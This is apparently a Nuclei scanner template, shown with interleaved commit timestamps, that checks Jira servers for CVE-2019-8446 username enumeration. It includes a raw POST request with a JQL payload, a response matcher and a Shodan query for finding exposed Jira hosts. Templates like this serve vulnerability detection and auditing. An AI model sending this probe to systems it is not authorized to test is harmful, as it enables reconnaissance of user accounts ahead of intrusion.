2021-05-02 19:50:57 +00:00
id : CVE-2019-8446
info :
name : Jira Improper Authorization
author : dhiyaneshDk
severity : medium
2022-04-22 10:38:41 +00:00
description : The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
reference :
- https://jira.atlassian.com/browse/JRASERVER-69777
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-8446
cwe-id : CWE-863
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
epss-score : 0.0874
2022-07-04 13:18:32 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-04 13:18:32 +00:00
shodan-query : http.component:"Atlassian Jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,jira
2021-05-02 19:50:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-05-02 20:02:15 +00:00
- raw :
- |
POST /rest/issueNav/1/issueTable HTTP/1.1
Host : {{Hostname}}
Connection : Close
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token : no -check
Accept-Encoding : gzip, deflate
Accept-Language : en-US,en;q=0.9
2021-05-03 10:07:05 +00:00
{'jql' : 'project in projectsLeadByUser("{{randstr}}")' }
2021-05-02 19:50:57 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "the user does not exist"
part : body
- type : status
status :
- 200